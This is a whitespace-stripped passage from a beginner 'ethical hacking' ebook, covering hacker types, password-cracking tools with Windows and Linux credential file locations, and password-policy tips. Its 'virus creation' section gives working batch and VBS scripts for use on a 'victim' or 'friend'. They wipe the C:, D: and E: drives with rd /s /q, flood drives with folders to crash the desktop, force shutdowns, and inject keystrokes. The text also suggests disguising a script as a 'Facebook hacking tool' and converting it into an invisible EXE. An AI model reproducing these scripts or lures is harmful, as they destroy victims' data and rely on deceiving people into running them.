436
BY:UJJWALSAHAYCO-FOUNDER[www.thebigcomputing.com]
FINDOUTMORESTUFFLIKETHISON
TheBigComputing.com
WecoveruniqueEthicalHackingandPerformanceimprovementguides,NewsandTutorials.Ouraimistomakeyourdigitallifeeasy,pleasantand
secure.Ujjwalisaregularauthorandalsochiefsecurityadministratorattheplace,youcangetsolutionofyourqueries
LEGALDISCLAIMER
Anyproceedingsoractivitiesregardingthematerialcontainedwithinthisvolumeareexclusivelyyourliability.Themisuseandmistreatoftheinformation/tutorialinthisbookcanconsequenceinunlawfulchargesbroughtagainstthepersonsinquestion.Theauthorsandreviewanalyzerswillnotbeheldresponsibleintheeventanyunlawfulchargesbroughtagainstanyindividualsby
misusingtheinformationinthisbooktobreakthelaw.Thisbookcontainsmaterialandresourcesthatcanbepotentiallydestructiveordangerous.Ifyoudonotfullycomprehendsomethingonthisbook,don‘tstudythisbook.Pleaserefertothelawsandactsofyourstate/region/province/zone/territoryorcountrybeforeaccessing,using,orinanyotherwayutilizingtheseresources.
Thesematerialsandresourcesareforeducationalandresearchpurposesonly.Donotattempttoviolatethelawwithanythingenclosedherewithin.Ifthisisyourintention,thenleavenow.Neitherwriterofthisbook,reviewanalyzers,thepublisher,noranyoneelseaffiliatedinanyway,isgoingtoadmitanyresponsibilityforyourproceedings,actionsortrials.
ABOUTTHEAUTHOR…
UJJWALSAHAYisasovereignComputerSecurityConsultantandhasstate-of-the-artfamiliarityinthefieldofcomputer.Also,UJJWALSAHAYisacyber-securityexpertcertifiedbyLUCIDEUSTECHandhasdefinitiveexperienceinthefieldofcomputersandethical
hacking.UjjwalSahayistheAuthorofthebookHACK-X
CRYPT(AstraightforwardguidetowardsEthicalhackingandcybersecurity).Also,UjjwalSahayistheCo-founderofthetechno-hackingwebsitewww.thebigcomputing.com,heisthechiefsecurityconsultantofsite.Sahayishowever,morewellknownforhissignificantworkinthefieldofethicalhackingandcybersecurity.Sahayiscurrentlypursuing
hisstudiesincomputersciencewithspecializationincybersecurityatMITSGWALIOR.GetInTouchWithHimAtujjwal@thebigcomputing.com
PREFACE
Computerhackingisthepracticeofalteringcomputerhardwareandsoftwaretocarryoutagoaloutsideofthecreator‘soriginalintention.Peoplewhoslotincomputerhackingactionsandactivitiesareoftenentitledashackers.Themajorityofpeopleassumethathackersarecomputercriminals.Theyfall
shorttoidentifythefactthatcriminalsandhackersaretwoentirelyunrelatedthings.Hackersinrealismaregoodandextremelyintelligentpeople,whobyusingtheirknowledgeinaconstructivemodehelporganizations,companies,government,etc.tosecurecredentialsandsecretinformationontheInternet.Yearsago,noonehadtoworryaboutCrackersbreakingintotheircomputer
andinstallingTrojanviruses,orusingyourcomputertosendattacksagainstothers.Nowthatthinghavechanged,it'sbesttobeawareofhowtodefendyourcomputerfromdamagingintrusionsandpreventblackhathackers.So,inthisBookyouwilluncoverthefinestwaystodefendyourcomputersystemsfromthehackersThisBookiswrittenbykeepingoneobjectinmindthatabeginner,whois
notmuchfamiliarregardingcomputerhacking,caneasily,attemptsthesehacksandrecognizewhatwearetryingtodemonstrate.AfterReadingthisbookyouwillcometorecognizethathowHackingisaffectingoureverydayroutineworkandcanbeveryhazardousinmanyfieldslikebankaccounthackingetc.Moreover,aftercarryingoutthisvolumeindetailyouwillbecapableof
understandingthathowahackerhacksandhowyoucandefendyourselffromthesethreats.
FORANYQUERIESANDSUGGESTIONSFEELFREETOCONTACTME:[email protected]
InTheLovingMemoryofmyDAD
YourhandssowarmYourvoicesoclearIstillrememberyourlaughterLikeyesterdayhadnevergoneImissyourwordsofencouragementWordsthatkeptmehangingonNowyouaregoneThetearskeepflowingOnlyhopingThatonedaythepainwillfadeDadwhydidyouhavetogoawayWeloveyouandmissyouIknowIwillagain
seeyousomeday
ACKNOWLEDGEMENTS…
Bookorvolumeofthistemperamentistremendouslycomplextowrite,particularlywithoutsupportoftheAlmightyGOD.IamhighlythankfultoLATEDR.BAKSHIKAMESHWARSRIVASTAVA,MRS.SHASHIBALA
SRIVASTAVA,Mr.BAKSHIRAJESHPRASADSINHAANDMRS.ARADHNASINHAtotrustonmycapabilities,withouttheirsupportandmotivationitwouldnotbepromisingtowritethisbook.IexpressheartfeltcredittoMyParentsLATEPROF.SAMIRKUMARSAHAYandMRS.SUMANSAHAYwithoutthemIhavenoexistence.Iamalsothanking
MR.BAKSHIRAJEEVPRASADSINHA,MRS.ANITASINHA,MR.BAKSHISANJEEVPRASADSINHA,MRS.PRITYSINHA,MR.RAJESHWARPRASADandMRS.PUNAMSINHAwhohelpedmeateachandeverystepofmylifebytheirprecioussupport.
IammorethaneverthankfultomycolleagueSaurabh
Tripathi(Creativehead@THEBIGCOMPUTING)forthereview,analysisandsuggestionsforsomegoodarticlesforthisbookandallindividualswhofacilitatedmeatvariousresearchstagesofthisvolume.
UJJWALSAHAY
FOOLISHASSUMPTIONS…
Imakeafewassumptionsaboutyou:You’refamiliar withbasiccomputer-,networking–relatedconceptsandterms.Youhaveabasicunderstandingofwhathackersandmalicioususersdo.Youhaveaccesstoacomputerandanetworkonwhichtousethesetechniques.Youhaveaccesstothe
Internettoobtainthevarioustoolsusedintheethicalhackingprocess.Youhavepermissiontoperformthehackingtechniquesdescribedinthisbook.
TableofContents
INTRODUCTIONTOHACKERS.......................................................................17
CommunitiesofHackers:-..........................................................................17INTENSIONOFHACKERS:...........................................................................17TypesofHackers:...........................................................................................18•WhiteHatHackers......................................................................................18•BlackHatHackers.......................................................................................
18•GreyHatHackers.........................................................................................18CRACKERS........................................................................................................19Intensionofcrackers:-.................................................................................19PHREAKS..........................................................................................................19Intentionofphreaks:-...................................................................................19
SCRIPTKIDDIES:-..........................................................................................20Intentionofscriptkiddies:-.........................................................................20BlackHatHackersStrategy:-.....................................................................20HACKERSWANTYOURPC…..........................................................................23CREATIONOFVIRUSINNOTEPAD
..............................................................26
1.)Tocreateahugeamountoffoldersonvictim'sdesktopscreen:.............................................................................................................................262.)TocreatemorefoldersinC,D,andEdriveofvictim’scomputer:.............................................................................................................................29
3.)ToformatC,D:andE:
driveofyourcomputer:-..............................304.)Conveyyourfriendalittlemessageandshutdownhis/hercomputer:-.......................................................................................................30
5.)OpenNotepad,slowlytype"Hello,howareyou?Iamgoodthanks"andfreakyourfriendout:-..........................................................................
316.)Hackyourfriend'skeyboardandmakehimtype"Youareafool"simultaneously:-............................................................................................33
7.)OpenNotepadcontinuallyinyourfriend'scomputer:...................338.)THRETENYOURFRIENDBYMAKINGSCREENFLASH.................34
ConvertBatchfilesintoExecutablePrograms.........................................37HACKING“OPEN”OPTION.............................................................................42PASSWORDCRACKING...................................................................................50Crackingpasswordswithhardcoretools................................................
51Password-crackingsoftware:-..................................................................51Cain&Abel:-....................................................................................................51Brutus:-.............................................................................................................52ElcomsoftDistributedPasswordRecovery:..........................................52ElcomsoftSystemRecovery:......................................................................
52JohntheRipper...............................................................................................52ophcrack...........................................................................................................53Aircrack-NG.....................................................................................................53ProactiveSystemPasswordRecovery....................................................53RainbowCrack
................................................................................................53pwdump3.........................................................................................................54PASSWORDCREATINGPOLICIES.................................................................57BYPASSWINDOWSLOGONSCREENPASSWORD..................................60KEYSTROKELOGGING.....................................................................................
63LearnHowtoHackWindowsExperienceIndex.......................................66HACKTOHIDELOCALDRIVES......................................................................71FORMATHARDDISKWITHNOTEPAD.......................................................78FUNNYVIRUSTOSHOCK
YOURFRIENDS.................................................81HOWTOCHANGEYOURPROCESSORNAME..........................................85HOWTOMAKEYOURGOOGLESEARCHSEFFECTIVE...........................93IOSPASSWORDCRACKING............................................................................96HACKTOHIDETHE
RECYCLEBIN..............................................................103HOWBOTNETDDoSATTACKWORKS…...................................................106DDoSAttack?................................................................................................106Botnet?...........................................................................................................107BotnetTools..................................................................................................108SlowLoris........................................................................................................109Tor’sHammer...............................................................................................109
Qslowloris......................................................................................................109ApacheKiller..................................................................................................110PyLoris............................................................................................................110DDoSim...........................................................................................................110BotnetDDoSAttacks..................................................................................110WEBSITEHACKING.........................................................................................113TESTINGSQLINJECTIONBYUSINGTOOL
...............................................130WI-FIHACKINGUSINGBACKTRACK..........................................................134NEWBIE’SWAYTOWARDSREVERSEENGINEERING..........................143EMAILANDFACEBOOKHACKINGBYPHISHING...................................149SecuringPenDrivesFromMaliciousViruses..........................................155HOWTOPROTECTYOUR
PDFFILESFROMCOPYING.........................160SENDINGAMESSAGETOOTHERUSERINYOURPC..........................166HOWTOCREATEAFOLDERWITHEMPTYNAME................................170HACKINGANDROIDPHONE.........................................................................173FULLCONTROLYOURPCBYPHONE........................................................178LAUNCHINGWINDOWS
GODMODE.........................................................183HOWTOCRACKANDROIDLOCKSCREEN...............................................187WI-FICRACKINGUSINGREAVERINBACKTRACK.................................191SOMEUSEFULWINDOWSSHORTCUTS..................................................196HOWTORECOVERPERMANENTLYDELETED
FILES...........................198CONCLUSION:-................................................................................................203
Let’sstartINTRODUCTION
INTRODUCTIONTOHACKERS
Firstofallbeforediggingintointensehackingprocesseslet’stakealookonwhathackingis,whothehackersare,whataretheirintentions,
typesofhackersandtheircommunitiesetc.
CommunitiesofHackers:
HACKERSCRACKERSPHREAKSSCRIPTKIDDIES
HACKERSaretheIntelligentComputerExperts.INTENSIONOFHACKERS:
•Togainin-depthknowledgeofanycomputersystem,whatishappeningatthebackendofanyspecificprogramofthesystembehindthescreenofthecomputersystem?
•Theirmotiveistofindpossiblesecurityriskandvulnerabilitiesinacomputersystemornetwork.
•Theycreatesecurityawarenessamongthepeople
bysharingknowledgeandpropersecuritypreventionsthatshouldbetakenbytheuser.
TypesofHackers:
•WhiteHatHackers–“Whitehats”isthenameusedforsecurityexperts.Whiletheyoftenusethesametoolsandtechniquesastheblackhats,theydosoinordertofoilthebadguys.Thatis,theyuse
thosetoolsforethicalhackingandcomputerforensics.Ethicalhackingistheprocessofusingsecuritytoolstotestandimprovesecurity(ratherthantobreakit!).Computerforensicsistheprocessofcollectingevidenceneededtoidentifyandconvictcomputercriminals.
•BlackHatHackers–Theyusetheirknowledgeandskillsetforillegalactivitiesand
destructiveintents.Obviously,the“blackhats”arethebadguys.Thesearethepeoplewhocreateandsendvirusesandworms,breakintocomputersystems,stealdata,shutdownnetworks,andbasicallycommitelectroniccrimes.Wetalkaboutblackhatsatseveralpointsinthisbook.Blackhathackersandmalwarewritersarenotconsideredasthesamething
inthesecuritycommunity—eventhoughtheyarebothbreakingthelaw.
•GreyHatHackersTheyusetheirknowledgeandskillsetforthelegalandillegalpurpose.Theyarewhitehatsinpublicbutinternallytheydosomeblackhatwork.Grayhatssitinthemiddleofthefencebecausesometimestheycrossthatethicalline(ormoreoften,defineit
differently).Forexample,grayhatswillbreakintoacompany’scomputersystemjusttowanderaroundandseewhat’sthere.Theythinkthatsimplybecausetheydon’tdamageanydata,they’renotcommittingacrime.Thentheygoandapplyforjobsassecurityconsultantsforlargecorporations.Theyjustifytheirearlierbreak-inassomesortofcomputersecuritytraining.Manyreallybelieve
thatthey’reprovidingapublicservicebylettingcompaniesknowthattheircomputersareatrisk.
CRACKERSarethosewhobreakintotheapplicationswithsomemaliciousintentionseitherfortheirpersonalgainortheirgreedyachievements.
Intensionofcrackers:•Theirmotiveistoget
unauthorizedaccessintoasystemandcausedamageordestroyorrevealconfidentialinformation.•Tocompromisethesystemtodenyservicestolegitimateusersfortroubling,harassingthemorfortakingrevenge.•Itcancausefinanciallosses&image/reputationdamages,defamationinthesocietyforindividualsororganizations.
PHREAKSarethosepeople
whousecomputerdevicesandsoftwareprogramsandtheirtrickyandsharpmindtobreakintothephonenetworks.
Intentionofphreaks:
•Tofindloopholesinsecurityinphonenetworkandtomakephonecallsandaccessinternetatfreeofcost!!!Youmaygetaspoofedcallorabigamountofbill.
Youcanalsogetacallwithyourownnumber.
SCRIPTKIDDIES:Thesearecomputernoviceswhotakeadvantageofthehackertools,vulnerabilityscanners,anddocumentationavailablefreeontheInternetbutwhodon’thaveanyrealknowledgeofwhat’sreallygoingonbehindthescenes.Theyknowjustenoughtocauseyouheadachesbuttypicallyare
verysloppyintheiractions,leavingallsortsofdigitalfingerprintsbehind.Eventhoughtheseguysarethestereotypicalhackersthatyouhearaboutinthenewsmedia,theyoftenneedonlyminimalskillstocarryouttheirattacks.
Intentionofscriptkiddies:•Theyusetheavailableinformationaboutknownvulnerabilitiestobreakinto
thenetworksystems.•It’sanactperformedforafunoroutofcuriosity.BlackHatHackersStrategy:•InformationGathering&Scanning•GettingAccessonthewebsite•Maintaintheaccess•CleartheTracksConclusion:Securityisimportantbecausepreventionisbetterthancure.
HACKERSWANTYOURPC
HACKERSWANTYOURPC…
Youmightbethinkingthathackersdon’tcareaboutyourcomputer,but
theydo.Hackerswantaccesstoyoursystemformanydifferentreasons.Remember,onceahackerbreaksinandplantsaTrojan,thedoorisopenforanyonetoreturn.Thehackersknowthisandaremakingmoneyofffromit.Theyknowit’seasytohideandverydifficulttotrackthembackoncetheyownyourPC.
Overall,theInternetisan
easyplacetohide.Compromisedcomputersaroundtheworldhavehelpedtomakehidingsimple.ItiseasytofindthelastIPaddressfromwhereanattackwaslaunched,buthackershopfrommanyunsecuredsystemstohidetheirlocationbeforetheylaunchattacks.
IPaddressisauniqueaddressthatidentifieswhereacomputerisconnectedtothe
Internet.Everycomputer,evenyoursifyou’reusingbroadbandaccess,hasanInternetprotocol(IP)address.
Overthepastfouryears,mostcyber-attackshavebeenlaunchedfromcomputerswithintheINDIA.However,thisdoesn’tmeanthatsystemsintheINDIAaretheoriginalsourceoftheattack.AhackerinPakistancouldactuallyuseyourcomputerto
launchadenialofservice(DOS)attack.Totheentireworld,itmightevenlookasifyoustartedtheattackbecausethehackerhashiddenhistrackssothatonlythelast“hop”canbetraced
.
VIRUSCREATIONS
CREATIONOFVIRUSINNOTEPAD
Now,it’stimetoadministrate
yourcomputerbycreatingsomevirusesintheformofbatchfile.Youcancreatevarioustypesofviruseswithhavingdistinctfunctionality.Eachandeveryviruswillaffectthevictim’scomputersystembythewayyouhavecodeditsprogramminginthebatchfile.Youcancreateviruseswhichcanfreezethevictim’scomputeroritcanalsocrashit.
Viruscreationcodesofthebatchfile:---Codestobewritteninthenotepad---Extensionofthefilesshouldbe".bat"-
1.)Tocreateahugeamountoffoldersonvictim'sdesktopscreen:Firstofallyourtaskistocopythefollowingcodesinthenotepadofyourcomputer.Foropeningthenotepad:
Gotorunoptionofyourcomputerbypressing“window+R”.Simplytype“notepad”andclickontheOKoption.
CODES:@echooff
:topmd%random%gototop.
Nowwhenyouhavecopiedthecodesinthenotepadyournextworkistosavethetext
documentyouhavecreated.Gotofileoptionandsaveyourdocumentbyanynamebut“don’tforgettokeeptheextensionas‘.bat’.
Forexampleyoucansaveyourtextdocumentbythename“ujjwal.bat”
Oryoucanalsokeepyourdocumentnameas“Facebookhackingtool.bat”toconfusethevictimandenforcehimto
openthevirusyouhavecreatedtodestroythedesktopofthevictim.
Whenyouhavedonesavingthedocumentjustdoubleclickonthebatchfiletoopenit.
Suddenlyyouwillseethatthe
commandpromptofthevictim’scomputeropenedautomaticallyanditwilldisplaylargeamountofcodestorunninginthecommandprompt.After5-10secondsyouwillseethatthereareahugeamountoffolderscreatedautomaticallyonthedesktopofthevictimanditwillalsoleadsthedesktoptofreezeorcrash.
2.)TocreatemorefoldersinC,D,andEdriveofvictim’scomputer:-
Aswehavelearnedabovetocreatemanyfoldersonthedesktopofthevictim,inthesamewaywecancreatealotoffoldersintheC:,D:,andE:drivesofthevictimscomputerbyapplyingthesamemethodaswehavefollowedabovebutthereisalittleamendmentinthecodes
ofthebatchfileofthisvirus.
CODES:@echooff
:VIRUScd/dC:md%random%cd/dD:md%random%cd/dE:md%random%gotoVIRUS
Copyandpastetheabovecodeinthenotepadandfollowthesamestepsaswehavefollowedbeforetocreatemorenumbersoffoldersinthelocaldrivesofthevictim’scomputer.
3.)ToformatC,D:andE:driveofyourcomputer:
OpenNotepadCopythebelowcommandthere
"rd/s/qD:\rd/s/qC:\rd/s/qE:\"(Withoutquotes)Saveas"anything.bat
Doubleclickonthevirusicon.ThisvirusformatstheC,DandEDrivein5Seconds.4.)Conveyyourfriendalittlemessageandshutdownhis/hercomputer:
@echooff
msg*Idon'tlikeyoushutdown-c"Error!Youaretoostupid!"-s
Saveitas"Anything.BAT"inAllFilesandsendit.
5.)OpenNotepad,slowlytype"Hello,howareyou?Iamgoodthanks"andfreakyourfriendout:
Openthenotepadandtypethefollowingcode:
WScript.Sleep180000WScript.Sleep10000SetWshShell=WScript.CreateObject("WScript.Shell")WshShell.Run"notepad"WScript.Sleep100WshShell.AppActivate"Notepad"WScript.Sleep500WshShell.SendKeys"Hel"WScript.Sleep500WshShell.SendKeys"lo"WScript.Sleep500WshShell.SendKeys",ho"
WScript.Sleep500WshShell.SendKeys"wa"WScript.Sleep500WshShell.SendKeys"re"WScript.Sleep500WshShell.SendKeys"you"WScript.Sleep500WshShell.SendKeys"?"WScript.Sleep500WshShell.SendKeys"Ia"WScript.Sleep500WshShell.SendKeys"mg"WScript.Sleep500WshShell.SendKeys"ood"
WScript.Sleep500WshShell.SendKeys"th"WScript.Sleep500WshShell.SendKeys"ank"WScript.Sleep500WshShell.SendKeys"s!"
Saveitas"Anything.VBS"andsendit.6.)Hackyourfriend'skeyboardandmakehimtype"Youareafool"simultaneously:Openthenotepadandtype
thefollowingcodes:
SetwshShell=wscript.CreateObject("WScript.Shell")dowscript.sleep100wshshell.sendkeys"Youareafool."loop
Saveitas"Anything.VBS"andsendit.7.)OpenNotepadcontinuallyinyourfriend'scomputer:
Openthenotepadandtypethefollowingcodes:@ECHOoff:topSTART%SystemRoot%\system32\notepad.exeGOTOtop
Saveitas"Anything.BAT"andsendit.8.)THRETENYOURFRIENDBYMAKINGSCREENFLASH
Tomakeareallycoolbatchfilethatcanmakeyourentirescreenflashrandomcolorsuntilyouhitakeytostopit,simplycopyandpastethefollowingcodeintonotepadandthensaveitasa.batfile.
@echooffechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA808
75>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbg
Butifyoureallywanttomesswithafriendthencopyandpastethefollowingcode
whichwilldothesamethingexceptwhentheypressakeythescreenwillgoblackandtheonlywaytostopthebatchfileisbypressingCTRL-ALT-DELETE.Codes:
@echooff:aechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120
FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbggotoa
Todisableerror(ctrl+shirt+esc)thenendprocesswscript.exeEnjoy!!!
Note:-someoftheabovegivencodescanharmyourcomputerafterexecutionso;don’ttryitonyourpc.Youcanuseatestcomputerforit.
BATCHTOEXECONVERSION
ConvertBatchfilesintoExecutablePrograms
Thebatchfilesandtheexecutablefilesworkin
almostsimilarway.Basicallybothareasmuchasasetofinstructionsandlogicsforthecommandexecution.Butmorepreferablywetreatexecutablefilesastheyaremoreconvenientthanbatchone.
Butwhywouldwewantthat?Someofthereasonsarelistedbelow:1.WecanincludeextratoolsinourEXEdependentbatch
file.
2.MoreoverEXEprovidesprotectiontothesourcescripttorestrictmodification.3.EXEfilescanbepinnedtowindowsstartmenuaswellasinthetaskbar.Hereweareusingatoolcalled“Batchtoexeconverter”whichprovidesyouaplatformtorunthebatchfilesasexecutablefiles.Youcandownloaditfromhere
“BattoExeConverter”isaflowconversionprogramwhosepurposeistohelpyoutoeasilyobtainexecutablefilesoutofbatchitems.IfyouprefertoconvertaBATCHfileintoanexecutableoneeasily,“BattoExeConverter”isasimpleandyeteffectivesolution.
Theapplicationprovidesyouwithasimplifiedinterface,whichmakesitcomfortable
forbothbeginnerandadvancedusers.Fromitsprimarywindow,youhavetheabilitytoselectthedesiredbatchfileandoutputfile.Then,youwillbeabletocustomizeyoursettingsaccordingtoyourchoiceandpreferences.
AnotherinterestingandcompactiblefeatureisthatyoucanchoosethelanguageforyourEXEfile,thechoices
beingEnglishorGerman.FromtheOptionstab,userscanopttocreateavisibleorinvisibleapplication,whichmeansdisplayingaconsolewindowornot.However,ifyouwanttoencrypttheresultingEXEfile,youcanprotectitwithasecuritypassword.
MESSINGUPWITHREGISTRY
HACKING“OPEN”OPTION
Ifwewanttoopenanyfoldereitherweusetodoubleclickonthefolderorwejustright
clickonthefolderanditwillshowusadialogueboxwithOPENoptionatthetopofthedialoguebox.
Andtodaywearegoingtolearnthathowtohackthe“OPEN”optionbyanytextbywhichyouwanttoreplaceit.STEPS:Goto“run”optionandtype“regedit”andclickonok.Note:“regedit”standsfor
registryediting.
Registry:-itisresponsibleforsavingthebinaryequivalentworkingofeveryapplicationinoperatingsystem.
Thenawindowwillopeninfrontofyouofregistryediting.Ithasfiveoptions.
1.HKEY_CLASSES_ROOT2.HKEY_CURRENT_USER3.HKEY_LOCAL_MACHINE4.HKEY_USERS5.HKEY_CURRENT_CONFIG
Thenyouhavetoclickon“HKEY_CLASSES_ROOT”Itwillopenandyouseealotofitemsunderit.Searchforthe“FOLDER”
optionunderit.
Clickonthefolderoptiontoopenit.Whenyouopenfolderoptionyouwillseethe“SHELL”
option.Byopeningthe“SHELL”optionyouwillseethe“OPEN”optionunderit.JustgiveasingleclickontheopenoptioninsteadopeningitYouwillseetwoitemsdefinedintheleftwhiteworkspace.
Justopenthe“Default”string(1stoption).Donottouchthevaluename.Typeanythingbywhichyouwanttoreplaceyour“open”option.
ForexampleIamtypingherethat“yourcomputerishackedbyUjjwalSahay”.
Thenclickonokoption.Nowgoonanyfolderandjustgivearightclicktoit.
Woooooo!Nowtheopenoptionischangedbythetext“yourcomputerishackedby
UjjwalSahay”.
PASSWORDCRACKINGEXPLAINED
PASSWORDCRACKING
Passwordcrackersarethemostfamousandelementarytoolsinthehacker’stoolbox.
Thesehavebeenaroundforsometimeandarefairlyeffectiveat“guessing”mostusers’passwords,atleastinpartbecausemostusersdoaverypoorjobofselectingsecurepasswords.
Firstofallifahackerisgoingtocrackyourpasswordthenattheveryfirststeptheyusuallytrysomeguessestocrackyourpassword.Theygenerallymadeiteasyby
socialengineering.Hackersknowthatmostusersselectsimplepasswordsthatareeasytoremember.Thetopchoicesoftheusersarenearlyalwaysnamesthatarepersonallymeaningfultotheuser—firstnamesofimmediatefamilymembersleadthelist,followedbypet’snamesandfavoritesportingteams.PasswordcrackersmayenduploadingfullEnglishdictionaries,butthey
canhitafairnumberofpasswordswiththecontentsofanypopularbabynamebook.Otherpoorpasswordselectionsincludecommonnumbersandnumbersthatfollowacommonformatsuchasphonenumbersandsocialsecuritynumbers.
Compoundingtheproblem,manyuserssetthesameusernameandpasswordforallaccounts,allowinghackersto
haveafielddaywithasingleharvestedpassword.That’ssomethingtoconsiderbeforeyouusethesamepasswordforFacebookasyouuseatschooloratwork.Thekeytocreatingagoodpasswordistocreatesomethingthatsomeonecannotguessoreasilycrack.Usingyourpet’snamethereforeisnotagoodtechnique.Usingyourloginnameisalsoabadtechnique
becausesomeonewhoknowsyourlogin(oryourname,sincemanyloginnamesaresimplyvariationsonyoursurname),couldeasilybreakintoyoursystem.
Crackingpasswordswithhardcoretools
High-techpasswordcrackinginvolvesusingaprogramthattriestoguessapasswordbydeterminingallpossible
passwordcombinations.Thesehigh-techmethodsaremostlyautomatedafteryouaccessthecomputerandpassworddatabasefiles.Themainpassword-crackingmethodsaredictionaryattacks,bruteforceattacks,andrainbowattacks.Youfindouthoweachoftheseworkinthefollowingsections.
Password-crackingsoftware:Youcantrytocrackyour
organization’soperatingsystemandapplicationpasswordswithvariouspassword-crackingtools:
Cain&Abel:CainandAbelisawell-knownpasswordcrackingtoolthatiscapableofhandlingavarietyoftasks.ThemostnotablethingisthatthetoolisonlyavailableforWindowsplatforms.Itcanworkassnifferinthenetwork,crackingencrypted
passwordsusingthedictionaryattack,bruteforceattacks,cryptanalysisattacks,revealingpasswordboxes,uncoveringcachedpasswords,decodingscrambledpasswords,andanalyzingroutingprotocols.ItusetocracksLMandNTLanManager(NTLM)hashes,WindowsRDPpasswords,CiscoIOSandPIXhashes,VNCpasswords,RADIUShashes,andlotsmore.
(Hashesarecryptographicrepresentationsofpasswords.)
Brutus:Brutusisoneofthemostpopularremoteonlinepasswordcrackingtools.Itclaimstobethefastestandmostflexiblepasswordcrackingtool.ThistoolisfreeandisonlyavailableforWindowssystems.ItwasreleasedbackinOctober2000.
ItsupportsHTTP(BasicAuthentication),HTTP(HTMLForm/CGI),POP3,FTP,SMB,TelnetandothertypessuchasIMAP,NNTP,NetBus,etc.Youcanalsocreateyourownauthenticationtypes.Thistoolalsosupportsmulti-stageauthenticationenginesandisabletoconnect60simultaneoustargets.Italsohasresumedandloadoptions.So,youcanpausetheattack
processanytimeandthenresumewheneveryouwanttoresume.
ElcomsoftDistributedPasswordRecovery:
(www.elcomsoft.com/edpr.html)cracksWindows,MicrosoftOffice,PGP,Adobe,iTunes,andnumerousotherpasswordsinadistributedfashionusingupto10,000networkedcomputersatone
time.Plus,thistoolusesthesamegraphicsprocessingunit(GPU)videoaccelerationastheElcomsoftWirelessAuditortool,whichallowsforcrackingspeedsupto50timesfaster.
ElcomsoftSystemRecovery:(www.elcomsoft.com/esr.html)cracksOrresetsWindowsuserpasswords,setsadministrativerights,andresetspasswordexpirations
allfromabootableCD.
JohntheRipper:-(www.openwall.com/john)JohntheRipperisanotherwell-knownfreeopensourcepasswordcrackingtoolforLinux,UNIXandMacOSX.AWindowsversionisalsoavailable.Thistoolcandetectweakpasswords.Aproversionofthetoolisalsoavailable,whichoffersbetterfeaturesandnativepackages
fortargetoperatingsystems.
ophcrack:(http://ophcrack.sourceforge.net)cracksWindowsUserpasswordsusingrainbowtablesfromabootableCD.Rainbowtablesarepre-calculatedpasswordhashesthatcanhelpspeedupthecrackingprocess.
Aircrack-NG:-(http://www.aircrack-ng.org/)
Aircrack-NGisaWiFipasswordcrackingtoolthatcancrackWEPorWPApasswords.Itanalyzeswirelessencryptedpacketsandthentriestocrackpasswordsviaitscrackingalgorithm.ItisavailableforLinuxandWindowssystems.AliveCDofAircrackisalsoavailable.
ProactiveSystemPasswordRecovery
:
(www.elcomsoft.com/pspr.html)recoverspracticallyanylocallystoredWindowspassword,suchAslogonpasswords,WEP/WPApassphrases,SYSKEYpasswords,andRAS/dialup/VPNpasswords.
RainbowCrack:-(http://project-rainbowcrack.com)Rainbow
Crackisahashcrackertoolthatusesalarge-scaletime-memorytradeoffprocessforfasterpasswordcrackingthantraditionalbruteforcetools.Time-memorytradeoffisacomputationalprocessinwhichallplaintextandhashpairsarecalculatedbyusingaselectedhashalgorithm.Aftercomputation,resultsarestoredintherainbowtable.Thisprocessisverytimeconsuming.But,oncethe
tableisready,itcancrackapasswordmustfasterthanbruteforcetools.Youalsodonotneedtogeneraterainbowtabletsbyyourselves.DevelopersofRainbowCrackhavealsogeneratedLMrainbowtables,NTLMrainbowtables,MD5rainbowtablesandSha1rainbowtables.LikeRainbowCrack,thesetablesarealsoavailableforfree.Youcandownloadthesetablesand
useforyourpasswordcrackingprocesses.
pwdump3:-(www.openwall.com/passwords/microsoftwindowsnt-2000-xp-2003-vista-7#pwdump)passwordhashesfromtheSAM(Securitydatabase.extractsAccountsWindowsManager)
Passwordstoragelocationsvarybyoperatingsystem:
Windowsusuallystorespasswordsintheselocations:
•ActiveDirectorydatabasefilethat’sstoredlocallyorspreadacrossdomaincontrollers(ntds.dit)WindowsmayalsostorepasswordsinabackupoftheSAMfileinthec:\winnt\repairorc:\windows\repairdirectory.
•SecurityAccountsManager
(SAM)database(c:\winnt\system32\config)or(c:\windows\system32\config)
SomeWindowsapplicationsstorepasswordsintheRegistryorasplaintextfilesontheharddrive!Asimpleregistryorfile-systemsearchfor“password”mayuncoverjustwhatyou’relookingfor.
LinuxandotherUNIXvariantstypicallystore
passwordsinthesefiles:•/etc/passwd(readablebyeveryone)•/etc/shadow(accessiblebythesystemandtherootaccountonly)•/.secure/etc/passwd(accessiblebythesystemandtherootaccountonly)•/etc/security/passwd(accessiblebythesystemandtherootaccountonly)
MUSTHAVEPASSWORDPOLICIES
PASSWORDCREATINGPOLICIES
Asanethicalhacker,youshouldshowusersthe
importanceofsecuringtheirpasswords.Herearesometipsonhowtodothat:
Demonstratehowtocreatesecurepasswords:-generallypeopleusetocreatetheirpasswordsusingonlywords,whichcanbelesssecure.
Showwhatcanhappenwhenweakpasswordsareusedorpasswordsareshared.Diligentlybuilduser
awarenessofsocialengineeringattacks:Encouragetheuseofastrongpassword-creationpolicythatincludesthefollowingcriteria:Usepunctuationcharacterstoseparatewords.
Useupperandlowercaseletters,specialcharacters,andnumbers.Neveruseonlynumbers.Suchpasswordscanbe
crackedquickly.
Changepasswordsevery15to30daysorimmediatelyifthey’resuspectedofbeingcompromised.
Usedifferentpasswordsforeachsystem.Thisisespeciallyimportantfornetworkinfrastructurehosts,suchasservers,firewalls,androuters.It’sokaytousesimilar
passwords—justmakethemslightlydifferentforeachtypeofsystem,suchaswweraw777-Win7forWindowssystemsandwweraw453forLinuxsystems.
Usevariable-lengthpasswords.Thistrickcanthrowoffattackersbecausetheywon’tknowtherequiredminimumormaximumlengthofPasswordsandmusttryall
passwordlengthcombinations.
Don’tusecommonslangwordsorwordsthatareinadictionary.
Don’trelycompletelyonsimilar-lookingcharacters,suchas3insteadofE,5insteadofS,or!Insteadof1.Password-crackingprogramscanforthis.
